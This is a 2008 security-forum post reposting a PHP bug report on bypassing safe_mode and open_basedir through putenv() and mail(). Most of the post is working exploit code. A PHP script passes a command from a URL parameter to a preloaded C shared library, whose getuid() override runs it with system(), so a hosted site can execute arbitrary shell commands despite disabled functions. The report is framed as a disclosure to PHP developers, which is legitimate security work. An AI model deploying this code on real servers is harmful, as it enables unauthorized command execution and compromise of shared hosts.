|
|
|
|
Menu |
|
|
Home |
| |
|
Discussions |
| |
|
Tools |
| |
|
Affiliates |
| |
|
Content |
| |
|
Info |
| |
|
|
|
|
|
|
User Info |
|
Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9145
People Online:
Visitors: 766
Members: 0
Total: 766
|
|
|
|
|
|
PacketStorm News |
|
|
|
|
|
|
|
|
|
IT Security and Insecurity Portal |
|
|
safe_mode and open_basedir bypass via mail() and putenv() |
|
Posted: Wed Dec 10, 2008 5:08 pm |
|
|
waraxe |
Site admin |
|
|
Joined: May 11, 2004 |
Posts: 2407 |
Location: Estonia, Tartu |
|
|
|
|
|
|
http://aspn.activestate.com/ASPN/Mail/Message/php-dev/3681551
Code: |
From: gat3way at gat3way dot eu
Operating system: Linux
PHP version: 5.2.6
PHP Bug Type: Safe Mode/open_basedir
Bug description: putenv()+mail() allows for open_basedir bypass and "disabled" functionalit
y
Description:
------------
safe_mode is safe, but the mail() function should check environment
variables IMO.
e.g. you can putenv("LD_PRELOAD=evil_library.so"); and since mail() calls
/usr/bin/mail if your library exports function like getuid() you can bypass
open_basedir restrictions and restrictions on program execution, etc.
If you need some more info, please contact me at:
gat3way@[...].eu
Milen Rangelov
Reproduce code:
---------------
A PHP script:
<?php
putenv("LD_PRELOAD=/var/www/a.so");
$a=fopen("/var/www/.comm","w");
fputs($a,$_GET["c"]);
fclose($a);
mail("a","a","a","a");
$a=fopen("/var/www/.comm1","r");
while (!feof($a))
{$b=fgets($a);echo $b;}
fclose($a); ?>
A simple library:
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
int getuid()
{
char *en;
char *buf=malloc(300);
FILE *a;
unsetenv("LD_PRELOAD");
a=fopen("/var/www/.comm","r");
buf=fgets(buf,100,a);
write(2,buf,strlen(buf));
fclose(a); remove("/var/www/.comm");
rename("/var/www/a.so","/var/www/b.so");
buf=strcat(buf," > /var/www/.comm1");
system(buf);
rename("/var/www/b.so","/var/www/a.so");
free(buf);return 0;
}
Expected result:
----------------
execute arbitrary commands even though we have:
disable_functions = dl,system,exec,passthru,shell_exec,popen
open_basedir = /var/www
Actual result:
--------------
The test was successful.
|
|
|
|
|
|
|
www.waraxe.us Forum Index -> Php
You cannot post new topics in this forum You cannot reply to topics in this forum You cannot edit your posts in this forum You cannot delete your posts in this forum You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
|
|